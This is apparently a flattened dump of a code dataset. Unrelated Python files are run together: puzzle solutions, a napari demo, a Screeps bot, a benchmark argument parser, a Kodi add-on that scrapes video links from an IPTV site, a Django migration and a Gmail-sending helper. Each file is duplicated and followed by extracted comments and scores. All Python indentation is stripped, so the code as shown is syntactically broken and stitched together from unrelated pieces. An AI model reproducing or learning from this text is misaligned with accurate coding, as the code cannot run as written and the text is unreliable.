res = re.search(regex, line)
if res:
return (res.group(1), line[res.end():])
else:
return ('', line)
# returns (result, str-result)
def findBracketed(line: str) -> (str, str):
depth = 0
for i in range(0, len(line)):
c = line[i]
if c == '(':
depth += 1
elif c == ')':
depth -= 1
if depth == 0:
return (line[1:i], line[i + 1:])
return ('', line)
def parseLine(line: str) -> []:
validStrings = []
word = findWord(line)
if re.search(final, line) == None:
print(word[0])
validStrings.append(word[0])
if word[1][0] == ')':
return validStrings
elif word[1][0:2] == '|)':
return validStrings
elif word[1][0] == '|':
parseLine(word[1])
else:
parseLine(word[1])
else:
#print('final', line)
print(validStrings)
#return validStrings
#print(remaining)
#print(findBracketed(remaining))
#match = re.search(bracketed, remaining)
#print(match.group(0))
print(sample)
#sys.setrecursionlimit(100)
parseLine(sample)
#while sample != '$':
#for i in range(0, 11):
""" depth = 0
while re.search(final, sample) == None:
word = findWord(sample)
sample = word[1]
print('[{}, {}]'.format(word[0], sample))
if sample[0] == '(':
depth += 1
elif sample[0] == ')':
depth -= 1
elif sample[0:2] == '|)':
# add 'or just move on' option
depth -= 1
elif sample[0] == '|':
pass """
#brckt = findBracketed(sample)
#sample = brckt[1]
#print(brckt[0])
#word = findWord(sample)
#sample = word[1]
#print(word[0]) | import re, sys
#sample = '^ENWWW(NEEE|SSE(EE|N))SSWE(S|)$'
sample = '^ENNWSWW(NEWS|)SSSEEN(WNSE|)EE(SWEN|)NNN$'
#sample = '^ESSWWN(E|NNENN(EESS(WNSE|)SSS|WWWSSSSE(SW|NNNE)))$'
regex = re.compile(r'(\w+)')
bracketed = re.compile(r'\((\w*\|?)*\)')
final = re.compile(r'^((\)|\|)*\$)')
#bracketed = re.compile(r'\(([^()]|(\R?))*\)')
#match = re.search(regex, sample)
#remaining = sample[match.end():]
#print('"{}", "{}"'.format(match.group(1), remaining))
#match = re.search(bracketed, remaining)
#print(match.group(1))
#remaining = sample[match.end():]
# only for outer-most
def findWord(line: str) -> (str, str):
res = re.search(regex, line)
if res:
return (res.group(1), line[res.end():])
else:
return ('', line)
# returns (result, str-result)
def findBracketed(line: str) -> (str, str):
depth = 0
for i in range(0, len(line)):
c = line[i]
if c == '(':
depth += 1
elif c == ')':
depth -= 1
if depth == 0:
return (line[1:i], line[i + 1:])
return ('', line)
def parseLine(line: str) -> []:
validStrings = []
word = findWord(line)
if re.search(final, line) == None:
print(word[0])
validStrings.append(word[0])
if word[1][0] == ')':
return validStrings
elif word[1][0:2] == '|)':
return validStrings
elif word[1][0] == '|':
parseLine(word[1])
else:
parseLine(word[1])
else:
#print('final', line)
print(validStrings)
#return validStrings
#print(remaining)
#print(findBracketed(remaining))
#match = re.search(bracketed, remaining)
#print(match.group(0))
print(sample)
#sys.setrecursionlimit(100)
parseLine(sample)
#while sample != '$':
#for i in range(0, 11):
""" depth = 0
while re.search(final, sample) == None:
word = findWord(sample)
sample = word[1]
print('[{}, {}]'.format(word[0], sample))
if sample[0] == '(':
depth += 1
elif sample[0] == ')':
depth -= 1
elif sample[0:2] == '|)':
# add 'or just move on' option
depth -= 1
elif sample[0] == '|':
pass """
#brckt = findBracketed(sample)
#sample = brckt[1]
#print(brckt[0])
#word = findWord(sample)
#sample = word[1]
#print(word[0]) | en | 0.453116 | #sample = '^ENWWW(NEEE|SSE(EE|N))SSWE(S|)$' #sample = '^ESSWWN(E|NNENN(EESS(WNSE|)SSS|WWWSSSSE(SW|NNNE)))$' #bracketed = re.compile(r'\(([^()]|(\R?))*\)') #match = re.search(regex, sample) #remaining = sample[match.end():] #print('"{}", "{}"'.format(match.group(1), remaining)) #match = re.search(bracketed, remaining) #print(match.group(1)) #remaining = sample[match.end():] # only for outer-most # returns (result, str-result) #print('final', line) #return validStrings #print(remaining) #print(findBracketed(remaining)) #match = re.search(bracketed, remaining) #print(match.group(0)) #sys.setrecursionlimit(100) #while sample != '$': #for i in range(0, 11): depth = 0 while re.search(final, sample) == None: word = findWord(sample) sample = word[1] print('[{}, {}]'.format(word[0], sample)) if sample[0] == '(': depth += 1 elif sample[0] == ')': depth -= 1 elif sample[0:2] == '|)': # add 'or just move on' option depth -= 1 elif sample[0] == '|': pass #brckt = findBracketed(sample) #sample = brckt[1] #print(brckt[0]) #word = findWord(sample) #sample = word[1] #print(word[0]) | 2.863671 | 3 |
examples/interaction_box_image.py | royerloic/napari-gui | 0 | 6616788 | <reponame>royerloic/napari-gui
"""
Demonstrate interaction box on image layer
"""
from skimage import data
import numpy as np
import napari
from napari.utils.transforms import Affine
def on_transform_changed_drag(event):
viewer.layers.selection.active.affine = event.value
viewer = napari.view_image(data.astronaut(), rgb=True)
viewer.layers.selection.active.interactive = False
viewer.overlays.interaction_box.points = viewer.layers.selection.active.extent.world
viewer.overlays.interaction_box.show = True
viewer.overlays.interaction_box.show_vertices = True
viewer.overlays.interaction_box.show_handle = True
viewer.overlays.interaction_box.allow_new_selection = False
viewer.overlays.interaction_box.events.transform_drag.connect(on_transform_changed_drag)
napari.run()
| """
Demonstrate interaction box on image layer
"""
from skimage import data
import numpy as np
import napari
from napari.utils.transforms import Affine
def on_transform_changed_drag(event):
viewer.layers.selection.active.affine = event.value
viewer = napari.view_image(data.astronaut(), rgb=True)
viewer.layers.selection.active.interactive = False
viewer.overlays.interaction_box.points = viewer.layers.selection.active.extent.world
viewer.overlays.interaction_box.show = True
viewer.overlays.interaction_box.show_vertices = True
viewer.overlays.interaction_box.show_handle = True
viewer.overlays.interaction_box.allow_new_selection = False
viewer.overlays.interaction_box.events.transform_drag.connect(on_transform_changed_drag)
napari.run() | en | 0.509532 | Demonstrate interaction box on image layer | 2.49411 | 2 |
src/bots/spawn_delivery.py | ForgedSnow/ScreepsPython | 0 | 6616789 | from defs import *
__pragma__('noalias', 'name')
__pragma__('noalias', 'undefined')
__pragma__('noalias', 'Infinity')
__pragma__('noalias', 'keys')
__pragma__('noalias', 'get')
__pragma__('noalias', 'set')
__pragma__('noalias', 'type')
__pragma__('noalias', 'update')
def make_parts(max_energy):
parts = [WORK, CARRY, MOVE, MOVE]
count = max_energy - 300
if max_energy <= 300:
return [WORK, CARRY, MOVE, MOVE]
while count >= 50:
if count >= 100:
parts.append(WORK)
count -= 100
if count >= 50:
parts.append(CARRY)
count -= 50
if count >= 50:
parts.append(MOVE)
count -= 100
return parts
def run_spawn_delivery(creep):
if not creep.memory.working and creep.store[RESOURCE_ENERGY] == 0:
creep.memory.working = True
creep.say('collecting')
if creep.memory.working and creep.store.getFreeCapacity() == 0:
creep.memory.working = False
creep.say('working')
if creep.memory.working:
# nearest = creep.pos.findClosestByRange(FIND_SOURCES_ACTIVE)
nearest = creep.room.find(FIND_SOURCES_ACTIVE)[0]
if creep.harvest(nearest) == ERR_NOT_IN_RANGE:
creep.moveTo(nearest, {"visualizePathStyle": {"stroke": '#ffaa00'}})
else:
if creep.transfer(Game.spawns['Snow'], RESOURCE_ENERGY) == ERR_NOT_IN_RANGE:
creep.moveTo(Game.spawns['Snow'])
| from defs import *
__pragma__('noalias', 'name')
__pragma__('noalias', 'undefined')
__pragma__('noalias', 'Infinity')
__pragma__('noalias', 'keys')
__pragma__('noalias', 'get')
__pragma__('noalias', 'set')
__pragma__('noalias', 'type')
__pragma__('noalias', 'update')
def make_parts(max_energy):
parts = [WORK, CARRY, MOVE, MOVE]
count = max_energy - 300
if max_energy <= 300:
return [WORK, CARRY, MOVE, MOVE]
while count >= 50:
if count >= 100:
parts.append(WORK)
count -= 100
if count >= 50:
parts.append(CARRY)
count -= 50
if count >= 50:
parts.append(MOVE)
count -= 100
return parts
def run_spawn_delivery(creep):
if not creep.memory.working and creep.store[RESOURCE_ENERGY] == 0:
creep.memory.working = True
creep.say('collecting')
if creep.memory.working and creep.store.getFreeCapacity() == 0:
creep.memory.working = False
creep.say('working')
if creep.memory.working:
# nearest = creep.pos.findClosestByRange(FIND_SOURCES_ACTIVE)
nearest = creep.room.find(FIND_SOURCES_ACTIVE)[0]
if creep.harvest(nearest) == ERR_NOT_IN_RANGE:
creep.moveTo(nearest, {"visualizePathStyle": {"stroke": '#ffaa00'}})
else:
if creep.transfer(Game.spawns['Snow'], RESOURCE_ENERGY) == ERR_NOT_IN_RANGE:
creep.moveTo(Game.spawns['Snow'])
| en | 0.418835 | # nearest = creep.pos.findClosestByRange(FIND_SOURCES_ACTIVE) | 2.30814 | 2 |
setup.py | jrieffel/numpy_turtle | 5 | 6616790 | from setuptools import setup
setup(
name='numpy-turtle',
version='0.2',
packages=['numpy_turtle'],
python_requires='>=3.5',
install_requires=['numpy>=1.13.1', 'scikit_image>=0.13.1'],
url='https://github.com/jorenham/numpy_turtle',
license='MIT',
author='<NAME>',
author_email='<EMAIL>',
description='Turtle graphics with NumPy',
test_suite='nose.collector',
tests_require=['nose', 'tox'],
)
| from setuptools import setup
setup(
name='numpy-turtle',
version='0.2',
packages=['numpy_turtle'],
python_requires='>=3.5',
install_requires=['numpy>=1.13.1', 'scikit_image>=0.13.1'],
url='https://github.com/jorenham/numpy_turtle',
license='MIT',
author='<NAME>',
author_email='<EMAIL>',
description='Turtle graphics with NumPy',
test_suite='nose.collector',
tests_require=['nose', 'tox'],
)
| none | 1 | 1.211169 | 1 | |
benchmarks/xlmr/ootb/xlmr_parser.py | samiwilf/FAMBench | 9 | 6616791 | import argparse
import json
"""
Parse inputs for the XLM-R benchmark
"""
def dict_serialize(seqlen_dist_dict):
"""
dict->str
Turns {1:'a',2:'b'}->"[[1,'a'],[2,'b']]"
Why? Because this format plays nice with shell script that runs xlmr_bench.
Avoids curly braces and spaces that makes shell script str input unhappy.
"""
seqlen_dist_lst = list(seqlen_dist_dict.items())
seqlen_dist_str = json.dumps(seqlen_dist_lst)
seqlen_dist_str = seqlen_dist_str.replace(" ", "") # remove spaces
return seqlen_dist_str
def dict_deserialize(seqlen_dist_str):
"""
str->dict
"""
seqlen_dist_json = json.loads(seqlen_dist_str)
return dict(seqlen_dist_json)
def init_argparse() -> argparse.ArgumentParser:
"""
Returns a parser that can parse the given inputs by calling parser.parse_args()
Some types are functions - this is because argparse under the hood just calls the type on the input string.
Eg if type=int, then if you get a str="123", argparse calls int("123")->123.
"""
parser = argparse.ArgumentParser(
description="Benchmark XLM-R model"
)
parser.add_argument("--logdir", type=str, default=None)
parser.add_argument("--inference-only", action="store_true", default=False)
parser.add_argument("--famconfig", type=str, default="tiny")
parser.add_argument("--use-gpu", action="store_true", default=False)
parser.add_argument("--num-batches", type=int, default=10) # num batches to benchmark
parser.add_argument("--warmup-batches", type=int, default=0) # num batches to warmup
parser.add_argument("--batch-size", type=int, default=64)
parser.add_argument("--sequence-length", type=int, default=64)
parser.add_argument("--vocab-size", type=int, default=250000)
parser.add_argument("--half-model", action="store_true", default=False)
parser.add_argument('--seqlen-dist', type=str, default=None) # sequence length distribution. Type is string in JSON format.
parser.add_argument('--seqlen-dist-max', type=int, default=256) # maximum allowed sequence length
return parser
| import argparse
import json
"""
Parse inputs for the XLM-R benchmark
"""
def dict_serialize(seqlen_dist_dict):
"""
dict->str
Turns {1:'a',2:'b'}->"[[1,'a'],[2,'b']]"
Why? Because this format plays nice with shell script that runs xlmr_bench.
Avoids curly braces and spaces that makes shell script str input unhappy.
"""
seqlen_dist_lst = list(seqlen_dist_dict.items())
seqlen_dist_str = json.dumps(seqlen_dist_lst)
seqlen_dist_str = seqlen_dist_str.replace(" ", "") # remove spaces
return seqlen_dist_str
def dict_deserialize(seqlen_dist_str):
"""
str->dict
"""
seqlen_dist_json = json.loads(seqlen_dist_str)
return dict(seqlen_dist_json)
def init_argparse() -> argparse.ArgumentParser:
"""
Returns a parser that can parse the given inputs by calling parser.parse_args()
Some types are functions - this is because argparse under the hood just calls the type on the input string.
Eg if type=int, then if you get a str="123", argparse calls int("123")->123.
"""
parser = argparse.ArgumentParser(
description="Benchmark XLM-R model"
)
parser.add_argument("--logdir", type=str, default=None)
parser.add_argument("--inference-only", action="store_true", default=False)
parser.add_argument("--famconfig", type=str, default="tiny")
parser.add_argument("--use-gpu", action="store_true", default=False)
parser.add_argument("--num-batches", type=int, default=10) # num batches to benchmark
parser.add_argument("--warmup-batches", type=int, default=0) # num batches to warmup
parser.add_argument("--batch-size", type=int, default=64)
parser.add_argument("--sequence-length", type=int, default=64)
parser.add_argument("--vocab-size", type=int, default=250000)
parser.add_argument("--half-model", action="store_true", default=False)
parser.add_argument('--seqlen-dist', type=str, default=None) # sequence length distribution. Type is string in JSON format.
parser.add_argument('--seqlen-dist-max', type=int, default=256) # maximum allowed sequence length
return parser
| en | 0.573386 | Parse inputs for the XLM-R benchmark dict->str Turns {1:'a',2:'b'}->"[[1,'a'],[2,'b']]" Why? Because this format plays nice with shell script that runs xlmr_bench. Avoids curly braces and spaces that makes shell script str input unhappy. # remove spaces str->dict Returns a parser that can parse the given inputs by calling parser.parse_args() Some types are functions - this is because argparse under the hood just calls the type on the input string. Eg if type=int, then if you get a str="123", argparse calls int("123")->123. # num batches to benchmark # num batches to warmup # sequence length distribution. Type is string in JSON format. # maximum allowed sequence length | 3.462264 | 3 |
Day3/second.py | Woody1474747/AOC2021_Solutions | 0 | 6616792 | with open("test.txt") as file:
remaining = []
lines = file.readlines()
remaining = lines
for i in range(0, len(lines[0]) -1):
one = 0
zero = 0
cache = remaining
for line in cache:
if int(line[i]) == 0:
zero = zero + 1
else:
one = one + 1
remaining = []
if one > zero:
for line in cache:
if line[i] == "1":
remaining.append(line)
elif one == zero:
for line in cache:
if line[i] == "1":
remaining.append(line)
else:
for line in cache:
if line[i] == "0":
remaining.append(line)
oxygen = remaining[0]
remaining = lines
for i in range(0, len(lines[0]) - 1):
one = 0
zero = 0
cache = remaining
for line in cache:
if int(line[i]) == 0:
zero = zero + 1
else:
one = one + 1
remaining = []
if one > zero:
for line in cache:
if line[i] == "0":
remaining.append(line)
elif one == zero:
for line in cache:
if line[i] == "0":
remaining.append(line)
else:
for line in cache:
if line[i] == "1":
remaining.append(line)
if int(len(remaining)) == 1:
co = remaining[0]
print("end")
break
print(len(remaining))
print(int(oxygen, 2) * int(co, 2))
| with open("test.txt") as file:
remaining = []
lines = file.readlines()
remaining = lines
for i in range(0, len(lines[0]) -1):
one = 0
zero = 0
cache = remaining
for line in cache:
if int(line[i]) == 0:
zero = zero + 1
else:
one = one + 1
remaining = []
if one > zero:
for line in cache:
if line[i] == "1":
remaining.append(line)
elif one == zero:
for line in cache:
if line[i] == "1":
remaining.append(line)
else:
for line in cache:
if line[i] == "0":
remaining.append(line)
oxygen = remaining[0]
remaining = lines
for i in range(0, len(lines[0]) - 1):
one = 0
zero = 0
cache = remaining
for line in cache:
if int(line[i]) == 0:
zero = zero + 1
else:
one = one + 1
remaining = []
if one > zero:
for line in cache:
if line[i] == "0":
remaining.append(line)
elif one == zero:
for line in cache:
if line[i] == "0":
remaining.append(line)
else:
for line in cache:
if line[i] == "1":
remaining.append(line)
if int(len(remaining)) == 1:
co = remaining[0]
print("end")
break
print(len(remaining))
print(int(oxygen, 2) * int(co, 2))
| none | 1 | 3.169344 | 3 | |
channels/mmaiptv.py | sodicarus/channels | 0 | 6616793 | # -*- coding: utf-8 -*-
# StreamOnDemand Community Edition - Kodi Addon
# ------------------------------------------------------------
# streamondemand.- XBMC Plugin
# Canale mmaiptv
# http://www.mimediacenter.info/foro/viewforum.php?f=36
# Version: 201803160900
# ------------------------------------------------------------
import re
import urlparse
from core import config, httptools
from platformcode import logger
from core import scrapertools
from core import servertools
from core.item import Item
from core.tmdb import infoSod
#todo 1 : uniformare list_titles e episodes
#todo 2 : verificare la presenza di link adfly
#todo 3 : aggiungere altri menu (caricati di recente e in corso) che sembrano avere adfly
__channel__ = "mmaiptv"
host = "http://mmaiptv.it"
headers = [['Referer', host]]
def mainlist(item):
logger.info("[mmaiptv.py] mainlist")
# Main options
itemlist = [Item(channel=__channel__,
action="list_titles",
title="[COLOR azure]Tutti[/COLOR]",
url="%s/b.php" % host,
extra="anime",
thumbnail="http://orig03.deviantart.net/6889/f/2014/079/7/b/movies_and_popcorn_folder_icon_by_matheusgrilo-d7ay4tw.png"),
Item(channel=__channel__,
action="search",
title="[COLOR yellow]Cerca[/COLOR]",
url="%s/b.php" % host,
extra="search",
thumbnail="http://dc467.4shared.com/img/fEbJqOum/s7/13feaf0c8c0/Search")]
return itemlist
def list_titles(item):
logger.info("[mmaiptv.py] list_titles")
itemlist = []
if item.url == "":
item.url = host
# Carica la pagina
data = httptools.downloadpage(item.url, headers=headers).data
patronvideos = '<div class="tab-pane active".*?<font color="#000000">([^<]+)<\/font>.*?<a href="([^"]+)"><img src="([^"]+)".*?<\/div>'
matches = re.compile(patronvideos, re.DOTALL).findall(data)
for scrapedtitle, scrapedurl, scrapedthumbnail in matches:
itemlist.append(
Item(channel=__channel__,
action="episodes",
fulltitle=scrapedtitle,
show=scrapedtitle,
title=scrapedtitle,
url=scrapedurl if not 'search' in item.extra else (host + "/"+scrapedurl),
thumbnail=scrapedthumbnail,
extra=item.extra,
viewmode="movie_with_plot",
Folder=True))
return itemlist
def episodes(item):
logger.info("[mmaiptv.py] serietv")
itemlist = []
# Carica la pagina
data = httptools.downloadpage(item.url, headers=headers).data
patronvideos = '<div class="tab-pane active".*?<font color="#000000">([^<]+)<\/font>.*?<a href="([^"]+)"><img src="([^"]+)".*?<\/div>'
matches = re.compile(patronvideos, re.DOTALL).findall(data)
for scrapedtitle,scrapedurl,scrapedthumbnail in matches:
itemlist.append(
Item(channel=__channel__,
action="findvideos",
fulltitle=scrapedtitle,
show=scrapedtitle,
title=scrapedtitle,
url=scrapedurl,
thumbnail=scrapedthumbnail,
extra=item.extra,
viewmode="movie_with_plot"))
return list(reversed(itemlist))
def search(item, texto):
logger.info("[mmaiptv.py] search")
item.url = host + "/d.php?search=" + texto
return list_titles(item)
def findvideos(item):
logger.info("[mmaiptv.py] findvideos")
itemlist = []
data = httptools.downloadpage(item.url, headers=headers).data
patron = "file: \"([^\"]+)\""
matches = re.compile(patron, re.DOTALL).findall(data)
headers.append(['Referer', item.url])
for video in matches:
itemlist.append(Item(channel=__channel__, action="play", title=item.title,url=video, folder=False))
return itemlist
| # -*- coding: utf-8 -*-
# StreamOnDemand Community Edition - Kodi Addon
# ------------------------------------------------------------
# streamondemand.- XBMC Plugin
# Canale mmaiptv
# http://www.mimediacenter.info/foro/viewforum.php?f=36
# Version: 201803160900
# ------------------------------------------------------------
import re
import urlparse
from core import config, httptools
from platformcode import logger
from core import scrapertools
from core import servertools
from core.item import Item
from core.tmdb import infoSod
#todo 1 : uniformare list_titles e episodes
#todo 2 : verificare la presenza di link adfly
#todo 3 : aggiungere altri menu (caricati di recente e in corso) che sembrano avere adfly
__channel__ = "mmaiptv"
host = "http://mmaiptv.it"
headers = [['Referer', host]]
def mainlist(item):
logger.info("[mmaiptv.py] mainlist")
# Main options
itemlist = [Item(channel=__channel__,
action="list_titles",
title="[COLOR azure]Tutti[/COLOR]",
url="%s/b.php" % host,
extra="anime",
thumbnail="http://orig03.deviantart.net/6889/f/2014/079/7/b/movies_and_popcorn_folder_icon_by_matheusgrilo-d7ay4tw.png"),
Item(channel=__channel__,
action="search",
title="[COLOR yellow]Cerca[/COLOR]",
url="%s/b.php" % host,
extra="search",
thumbnail="http://dc467.4shared.com/img/fEbJqOum/s7/13feaf0c8c0/Search")]
return itemlist
def list_titles(item):
logger.info("[mmaiptv.py] list_titles")
itemlist = []
if item.url == "":
item.url = host
# Carica la pagina
data = httptools.downloadpage(item.url, headers=headers).data
patronvideos = '<div class="tab-pane active".*?<font color="#000000">([^<]+)<\/font>.*?<a href="([^"]+)"><img src="([^"]+)".*?<\/div>'
matches = re.compile(patronvideos, re.DOTALL).findall(data)
for scrapedtitle, scrapedurl, scrapedthumbnail in matches:
itemlist.append(
Item(channel=__channel__,
action="episodes",
fulltitle=scrapedtitle,
show=scrapedtitle,
title=scrapedtitle,
url=scrapedurl if not 'search' in item.extra else (host + "/"+scrapedurl),
thumbnail=scrapedthumbnail,
extra=item.extra,
viewmode="movie_with_plot",
Folder=True))
return itemlist
def episodes(item):
logger.info("[mmaiptv.py] serietv")
itemlist = []
# Carica la pagina
data = httptools.downloadpage(item.url, headers=headers).data
patronvideos = '<div class="tab-pane active".*?<font color="#000000">([^<]+)<\/font>.*?<a href="([^"]+)"><img src="([^"]+)".*?<\/div>'
matches = re.compile(patronvideos, re.DOTALL).findall(data)
for scrapedtitle,scrapedurl,scrapedthumbnail in matches:
itemlist.append(
Item(channel=__channel__,
action="findvideos",
fulltitle=scrapedtitle,
show=scrapedtitle,
title=scrapedtitle,
url=scrapedurl,
thumbnail=scrapedthumbnail,
extra=item.extra,
viewmode="movie_with_plot"))
return list(reversed(itemlist))
def search(item, texto):
logger.info("[mmaiptv.py] search")
item.url = host + "/d.php?search=" + texto
return list_titles(item)
def findvideos(item):
logger.info("[mmaiptv.py] findvideos")
itemlist = []
data = httptools.downloadpage(item.url, headers=headers).data
patron = "file: \"([^\"]+)\""
matches = re.compile(patron, re.DOTALL).findall(data)
headers.append(['Referer', item.url])
for video in matches:
itemlist.append(Item(channel=__channel__, action="play", title=item.title,url=video, folder=False))
return itemlist
| it | 0.381173 | # -*- coding: utf-8 -*- # StreamOnDemand Community Edition - Kodi Addon # ------------------------------------------------------------ # streamondemand.- XBMC Plugin # Canale mmaiptv # http://www.mimediacenter.info/foro/viewforum.php?f=36 # Version: 201803160900 # ------------------------------------------------------------ #todo 1 : uniformare list_titles e episodes #todo 2 : verificare la presenza di link adfly #todo 3 : aggiungere altri menu (caricati di recente e in corso) che sembrano avere adfly # Main options # Carica la pagina # Carica la pagina | 1.732372 | 2 |
twitter/envs/__init__.py | Ra-Ni/Twitter-Language-Identifier | 0 | 6616794 | from .corpus import *
| from .corpus import *
| none | 1 | 0.931267 | 1 | |
mainapp/migrations/0004_auto_20180811_0952.py | sndp487/rescuekerala | 657 | 6616795 | # Generated by Django 2.1 on 2018-08-11 09:52
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
("mainapp", "0003_auto_20180811_0946"),
]
operations = [
migrations.AlterField(model_name="request", name="status", field=models.BooleanField(default=False),),
]
| # Generated by Django 2.1 on 2018-08-11 09:52
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
("mainapp", "0003_auto_20180811_0946"),
]
operations = [
migrations.AlterField(model_name="request", name="status", field=models.BooleanField(default=False),),
]
| en | 0.680792 | # Generated by Django 2.1 on 2018-08-11 09:52 | 1.474763 | 1 |
AM_Nihoul_website/admin/utils.py | pierre-24/AM-Nihoul-website | 0 | 6616796 | <reponame>pierre-24/AM-Nihoul-website<gh_stars>0
"""
Utils functions to send an email via Gmail, extended to accept embedded files. Most of the code is due to
https://github.com/jeremyephron/simplegmail/blob/66e776d5211042b2868664ca800bdfc45323732c/simplegmail/gmail.py
"""
from typing import Optional, List
import base64
import mimetypes
import pathlib
from email.mime.audio import MIMEAudio
from email.mime.application import MIMEApplication
from email.mime.base import MIMEBase
from email.mime.image import MIMEImage
from email.mime.multipart import MIMEMultipart
from email.mime.text import MIMEText
from googleapiclient.discovery import build
from googleapiclient.errors import HttpError
from httplib2 import Http
from oauth2client import client, file, tools
from oauth2client.clientsecrets import InvalidClientSecretsError
class Message:
"""Class representing a message, ready to be sent
"""
def __init__(
self,
sender: str,
recipient: str,
subject: str = '',
msg_html: str = '',
msg_plain: str = '',
cc: List[str] = None,
bcc: List[str] = None
):
self.sender = sender
self.recipient = recipient
self.subject = subject
self.msg_plain = msg_plain
self.msg_html = msg_html
self.cc = [] if cc is None else cc
self.bcc = [] if bcc is None else bcc
self.html_attachments: List[MIMEBase] = []
self.extra_attachments: List[MIMEBase] = []
def add_attachment(self, path: pathlib.Path) -> None:
"""Attach a file as a normal attachment"""
attachment = Message.create_attachment_from_file(path)
self.extra_attachments.append(attachment)
def add_html_attachment(self, path: pathlib.Path, cid: str = None) -> None:
"""Add a HTML inline attachment (to be embedded).
If `cid` is `None`, the `cid` is taken as the file basename.
"""
if cid is None:
cid = path.name
attachment = Message.create_attachment_from_file(path, 'inline', cid)
self.html_attachments.append(attachment)
@staticmethod
def create_attachment_from_file(path: pathlib.Path, disposition: str = 'attachment', cid: str = None) -> MIMEBase:
"""Create an attachment from a file"""
content_type, encoding = mimetypes.guess_type(str(path))
name = path.name
# backup to octet-stream if any
if content_type is None or encoding is not None:
content_type = 'application/octet-stream'
# create attachment
main_type, sub_type = content_type.split('/', 1)
with path.open('rb') as f:
raw_data = f.read()
if main_type == 'text':
attachment = MIMEText(raw_data.decode('UTF-8'), _subtype=sub_type)
elif main_type == 'image':
attachment = MIMEImage(raw_data, _subtype=sub_type)
elif main_type == 'audio':
attachment = MIMEAudio(raw_data, _subtype=sub_type)
elif main_type == 'application':
attachment = MIMEApplication(raw_data, _subtype=sub_type)
else:
attachment = MIMEBase(main_type, sub_type)
attachment.set_payload(raw_data)
# add info
attachment.add_header('Content-Disposition', disposition, filename=name)
if cid is not None:
attachment.add_header('Content-ID', '<{}>'.format(cid))
return attachment
def prepare(self) -> dict:
"""
Get the message in a form that the Gmail API understand
"""
has_attachments = len(self.extra_attachments) != 0 or len(self.html_attachments) != 0
# create the message
msg = MIMEMultipart('mixed' if has_attachments else 'alternative')
msg['To'] = self.recipient
msg['From'] = self.sender
msg['Subject'] = self.subject
if len(self.cc) > 0:
msg['Cc'] = ', '.join(self.cc)
if len(self.bcc) > 0:
msg['Bcc'] = ', '.join(self.bcc)
# attach the text(s) to the message correctly
attachments = []
attach_plain = MIMEText(self.msg_plain, 'plain')
attach_html = MIMEText(self.msg_html, 'html')
if not has_attachments:
if self.msg_plain:
attachments.append(attach_plain)
if self.msg_html:
attachments.append(attach_html)
else:
attachment_alt = MIMEMultipart('alternative')
attach_related = MIMEMultipart('related')
if self.msg_plain:
attachment_alt.attach(attach_plain)
if self.msg_html:
attach_related.attach(attach_html)
# add the HTML attachments to the related part
for attachment in self.html_attachments:
attach_related.attach(attachment)
attachment_alt.attach(attach_related)
attachments.append(attachment_alt)
# add other attachments
attachments.extend(self.extra_attachments)
# attach
for attachment in attachments:
msg.attach(attachment)
# get dict
return {
'raw': base64.urlsafe_b64encode(msg.as_string().encode()).decode()
}
class Gmail:
"""
The Gmail object, used as entry point for the Gmail API.
"""
# Allow Gmail to read and write emails, and access settings like aliases.
_SCOPES = [
'https://www.googleapis.com/auth/gmail.modify',
'https://www.googleapis.com/auth/gmail.settings.basic'
]
def __init__(
self,
client_secret_file: str = 'client_secret.json',
creds_file: str = 'gmail_token.json',
_creds: Optional[client.Credentials] = None
) -> None:
self.client_secret_file = client_secret_file
self.creds_file = creds_file
try:
if _creds:
self.creds = _creds
else:
store = file.Storage(self.creds_file)
self.creds = store.get()
if not self.creds or self.creds.invalid:
# Will ask you to authenticate an account in your browser.
flow = client.flow_from_clientsecrets(self.client_secret_file, self._SCOPES)
self.creds = tools.run_flow(flow, store)
self.service = build('gmail', 'v1', http=self.creds.authorize(Http()), cache_discovery=False)
except InvalidClientSecretsError:
raise FileNotFoundError(
"Your 'client_secret.json' file is nonexistent. Make sure "
'the file is in the root directory of your application. If '
"you don't have a client secrets file, go to https://"
'developers.google.com/gmail/api/quickstart/python, and '
'follow the instructions listed there.'
)
def send(self, message: Message, user_id: str = 'me') -> None:
"""Send a message
"""
msg = message.prepare()
try:
req = self.service.users().messages().send(userId=user_id, body=msg)
req.execute()
except HttpError as error:
# Pass along the error
raise error
| """
Utils functions to send an email via Gmail, extended to accept embedded files. Most of the code is due to
https://github.com/jeremyephron/simplegmail/blob/66e776d5211042b2868664ca800bdfc45323732c/simplegmail/gmail.py
"""
from typing import Optional, List
import base64
import mimetypes
import pathlib
from email.mime.audio import MIMEAudio
from email.mime.application import MIMEApplication
from email.mime.base import MIMEBase
from email.mime.image import MIMEImage
from email.mime.multipart import MIMEMultipart
from email.mime.text import MIMEText
from googleapiclient.discovery import build
from googleapiclient.errors import HttpError
from httplib2 import Http
from oauth2client import client, file, tools
from oauth2client.clientsecrets import InvalidClientSecretsError
class Message:
"""Class representing a message, ready to be sent
"""
def __init__(
self,
sender: str,
recipient: str,
subject: str = '',
msg_html: str = '',
msg_plain: str = '',
cc: List[str] = None,
bcc: List[str] = None
):
self.sender = sender
self.recipient = recipient
self.subject = subject
self.msg_plain = msg_plain
self.msg_html = msg_html
self.cc = [] if cc is None else cc
self.bcc = [] if bcc is None else bcc
self.html_attachments: List[MIMEBase] = []
self.extra_attachments: List[MIMEBase] = []
def add_attachment(self, path: pathlib.Path) -> None:
"""Attach a file as a normal attachment"""
attachment = Message.create_attachment_from_file(path)
self.extra_attachments.append(attachment)
def add_html_attachment(self, path: pathlib.Path, cid: str = None) -> None:
"""Add a HTML inline attachment (to be embedded).
If `cid` is `None`, the `cid` is taken as the file basename.
"""
if cid is None:
cid = path.name
attachment = Message.create_attachment_from_file(path, 'inline', cid)
self.html_attachments.append(attachment)
@staticmethod
def create_attachment_from_file(path: pathlib.Path, disposition: str = 'attachment', cid: str = None) -> MIMEBase:
"""Create an attachment from a file"""
content_type, encoding = mimetypes.guess_type(str(path))
name = path.name
# backup to octet-stream if any
if content_type is None or encoding is not None:
content_type = 'application/octet-stream'
# create attachment
main_type, sub_type = content_type.split('/', 1)
with path.open('rb') as f:
raw_data = f.read()
if main_type == 'text':
attachment = MIMEText(raw_data.decode('UTF-8'), _subtype=sub_type)
elif main_type == 'image':
attachment = MIMEImage(raw_data, _subtype=sub_type)
elif main_type == 'audio':
attachment = MIMEAudio(raw_data, _subtype=sub_type)
elif main_type == 'application':
attachment = MIMEApplication(raw_data, _subtype=sub_type)
else:
attachment = MIMEBase(main_type, sub_type)
attachment.set_payload(raw_data)
# add info
attachment.add_header('Content-Disposition', disposition, filename=name)
